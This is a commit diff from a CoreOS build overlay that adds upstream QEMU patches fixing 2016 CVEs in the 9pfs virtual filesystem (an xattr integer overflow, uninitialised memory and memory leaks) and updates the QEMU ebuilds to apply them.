+++ b/hw/9pfs/9p.c
@@ -3269,8 +3269,8 @@ static void coroutine_fn v9fs_xattrcreate(void *opaque)
xattr_fidp->fs.xattr.flags = flags;
v9fs_string_init(&xattr_fidp->fs.xattr.name);
v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);
g_free(xattr_fidp->fs.xattr.value);
- xattr_fidp->fs.xattr.value = g_malloc(size);
+ xattr_fidp->fs.xattr.value = g_malloc0(size);
err = offset;
put_fid(pdu, file_fidp);
out_nofid:

92
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9104.patch vendored Normal file
View File

@ -0,0 +1,92 @@
From 7e55d65c56a03dcd2c5d7c49d37c5a74b55d4bd6 Mon Sep 17 00:00:00 2001
From: Li Qiang <liqiang6-s@360.cn>
Date: Tue, 1 Nov 2016 12:00:40 +0100
Subject: [PATCH] 9pfs: fix integer overflow issue in xattr read/write
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
The v9fs_xattr_read() and v9fs_xattr_write() are passed a guest
originated offset: they must ensure this offset does not go beyond
the size of the extended attribute that was set in v9fs_xattrcreate().
Unfortunately, the current code implement these checks with unsafe
calculations on 32 and 64 bit values, which may allow a malicious
guest to cause OOB access anyway.
Fix this by comparing the offset and the xattr size, which are
both uint64_t, before trying to compute the effective number of bytes
to read or write.
Suggested-by: Greg Kurz <groug@kaod.org>
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
Reviewed-by: Greg Kurz <groug@kaod.org>
Reviewed-By: Guido Günther <agx@sigxcpu.org>
Signed-off-by: Greg Kurz <groug@kaod.org>
---
hw/9pfs/9p.c | 32 ++++++++++++--------------------
1 file changed, 12 insertions(+), 20 deletions(-)
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index ab18ef2..7705ead 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -1637,20 +1637,17 @@ static int v9fs_xattr_read(V9fsState *s, V9fsPDU *pdu, V9fsFidState *fidp,
{
ssize_t err;
size_t offset = 7;
- int read_count;
- int64_t xattr_len;
+ uint64_t read_count;
V9fsVirtioState *v = container_of(s, V9fsVirtioState, state);
VirtQueueElement *elem = v->elems[pdu->idx];
- xattr_len = fidp->fs.xattr.len;
- read_count = xattr_len - off;
+ if (fidp->fs.xattr.len < off) {
+ read_count = 0;
+ } else {
+ read_count = fidp->fs.xattr.len - off;
+ }
if (read_count > max_count) {
read_count = max_count;
- } else if (read_count < 0) {
- /*
- * read beyond XATTR value
- */
- read_count = 0;
}
err = pdu_marshal(pdu, offset, "d", read_count);
if (err < 0) {
@@ -1979,23 +1976,18 @@ static int v9fs_xattr_write(V9fsState *s, V9fsPDU *pdu, V9fsFidState *fidp,
{
int i, to_copy;
ssize_t err = 0;
- int write_count;
- int64_t xattr_len;
+ uint64_t write_count;
size_t offset = 7;
- xattr_len = fidp->fs.xattr.len;
- write_count = xattr_len - off;
- if (write_count > count) {
- write_count = count;
- } else if (write_count < 0) {
- /*
- * write beyond XATTR value len specified in
- * xattrcreate
- */
+ if (fidp->fs.xattr.len < off) {
err = -ENOSPC;
goto out;
}
+ write_count = fidp->fs.xattr.len - off;
+ if (write_count > count) {
+ write_count = count;
+ }
err = pdu_marshal(pdu, offset, "d", write_count);
if (err < 0) {
return err;
--
2.7.3

25
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9105.patch vendored Normal file
View File

@ -0,0 +1,25 @@
From: Li Qiang <address@hidden>
In v9fs_link dispatch function, it doesn't put the 'oldfidp'
fid object, this will make the 'oldfidp->ref' never reach to 0,
thus leading a memory leak issue. This patch fix this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/9pfs/9p.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index 8b50bfb..29f8b7a 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -2413,6 +2413,7 @@ static void v9fs_link(void *opaque)
if (!err) {
err = offset;
}
+ put_fid(pdu, oldfidp);
out:
put_fid(pdu, dfidp);
out_nofid:
--
1.8.3.1

27
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-9106.patch vendored Normal file
View File

@ -0,0 +1,27 @@
Author: Li Qiang <liqiang6-s@360.cn>
Date: Mon Oct 17 14:13:58 2016 +0200
9pfs: fix memory leak in v9fs_write
If an error occurs when marshalling the transfer length to the guest, the
v9fs_write() function doesn't free an IO vector, thus leading to a memory
leak. This patch fixes the issue.
Signed-off-by: Li Qiang <liqiang6-s@360.cn>
Reviewed-by: Greg Kurz <groug@kaod.org>
[groug, rephrased the changelog]
Signed-off-by: Greg Kurz <groug@kaod.org>
diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
index d43a552..e88cf25 100644
--- a/hw/9pfs/9p.c
+++ b/hw/9pfs/9p.c
@@ -2090,7 +2090,7 @@ static void coroutine_fn v9fs_write(void *opaque)
offset = 7;
err = pdu_marshal(pdu, offset, "d", total);
if (err < 0) {
- goto out;
+ goto out_qiov;
}
err += offset;

37
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0.ebuild → sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-2.7.0-r7.ebuild vendored
View File

@ -10,7 +10,7 @@ PYTHON_REQ_USE="ncurses,readline"
PLOCALES="bg de_DE fr_FR hu it tr zh_CN" PLOCALES="bg de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils l10n user udev fcaps readme.gentoo-r1 pax-utils l10n
if [[ ${PV} = *9999* ]]; then if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git" EGIT_REPO_URI="git://git.qemu.org/qemu.git"
@ -94,7 +94,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
!gtk2? ( !gtk2? (
x11-libs/gtk+:3 x11-libs/gtk+:3
vte? ( x11-libs/vte:2.90 ) vte? ( x11-libs/vte:2.91 )
) )
) )
infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] ) infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] )
@ -108,7 +108,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
virtual/opengl virtual/opengl
media-libs/libepoxy[static-libs(+)] media-libs/libepoxy[static-libs(+)]
media-libs/mesa[static-libs(+)] media-libs/mesa[static-libs(+)]
media-libs/mesa[egl,gles2] media-libs/mesa[egl,gles2,gbm]
) )
png? ( media-libs/libpng:0=[static-libs(+)] ) png? ( media-libs/libpng:0=[static-libs(+)] )
pulseaudio? ( media-sound/pulseaudio ) pulseaudio? ( media-sound/pulseaudio )
@ -334,7 +334,36 @@ src_prepare() {
epatch "${FILESDIR}"/${PN}-2.5.0-cflags.patch epatch "${FILESDIR}"/${PN}-2.5.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.5.0-sysmacros.patch epatch "${FILESDIR}"/${PN}-2.5.0-sysmacros.patch
epatch "${FILESDIR}"/${P}-CVE-2016-6836.patch
epatch "${FILESDIR}"/${P}-CVE-2016-6836.patch # bug 591242
epatch "${FILESDIR}"/${P}-CVE-2016-7155.patch # bug 593034
epatch "${FILESDIR}"/${P}-CVE-2016-7156.patch # bug 593036
epatch "${FILESDIR}"/${P}-CVE-2016-7157-1.patch # bug 593038
epatch "${FILESDIR}"/${P}-CVE-2016-7157-2.patch # bug 593038
epatch "${FILESDIR}"/${P}-CVE-2016-7170.patch # bug 593284
epatch "${FILESDIR}"/${P}-CVE-2016-7421.patch # bug 593950
epatch "${FILESDIR}"/${P}-CVE-2016-7422.patch # bug 593956
epatch "${FILESDIR}"/${P}-CVE-2016-7423.patch # bug 594368
epatch "${FILESDIR}"/${P}-CVE-2016-7466.patch # bug 594520
epatch "${FILESDIR}"/${P}-CVE-2016-7907.patch # bug 596048
epatch "${FILESDIR}"/${P}-CVE-2016-7908.patch # bug 596049
epatch "${FILESDIR}"/${P}-CVE-2016-7909.patch # bug 596048
epatch "${FILESDIR}"/${P}-CVE-2016-7994-1.patch # bug 596738
epatch "${FILESDIR}"/${P}-CVE-2016-7994-2.patch # bug 596738
epatch "${FILESDIR}"/${P}-CVE-2016-8576.patch # bug 596752
epatch "${FILESDIR}"/${P}-CVE-2016-8577.patch # bug 596776
epatch "${FILESDIR}"/${P}-CVE-2016-8578.patch # bug 596774
epatch "${FILESDIR}"/${P}-CVE-2016-8668.patch # bug 597110
epatch "${FILESDIR}"/${P}-CVE-2016-8669-1.patch # bug 597108
epatch "${FILESDIR}"/${P}-CVE-2016-8669-2.patch # bug 597108
epatch "${FILESDIR}"/${P}-CVE-2016-8909.patch # bug 598044
epatch "${FILESDIR}"/${P}-CVE-2016-8910.patch # bug 598046
epatch "${FILESDIR}"/${P}-CVE-2016-9102.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9103.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9104.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9105.patch # bug 598328
epatch "${FILESDIR}"/${P}-CVE-2016-9106.patch # bug 598772
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY

6
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/qemu-9999.ebuild vendored
View File

@ -9,7 +9,7 @@ PYTHON_REQ_USE="ncurses,readline"
PLOCALES="bg de_DE fr_FR hu it tr zh_CN" PLOCALES="bg de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils l10n user udev fcaps readme.gentoo-r1 pax-utils l10n
if [[ ${PV} = *9999* ]]; then if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git" EGIT_REPO_URI="git://git.qemu.org/qemu.git"
@ -93,7 +93,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
!gtk2? ( !gtk2? (
x11-libs/gtk+:3 x11-libs/gtk+:3
vte? ( x11-libs/vte:2.90 ) vte? ( x11-libs/vte:2.91 )
) )
) )
infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] ) infiniband? ( sys-fabric/librdmacm:=[static-libs(+)] )
@ -107,7 +107,7 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
virtual/opengl virtual/opengl
media-libs/libepoxy[static-libs(+)] media-libs/libepoxy[static-libs(+)]
media-libs/mesa[static-libs(+)] media-libs/mesa[static-libs(+)]
media-libs/mesa[egl,gles2] media-libs/mesa[egl,gles2,gbm]
) )
png? ( media-libs/libpng:0=[static-libs(+)] ) png? ( media-libs/libpng:0=[static-libs(+)] )
pulseaudio? ( media-sound/pulseaudio ) pulseaudio? ( media-sound/pulseaudio )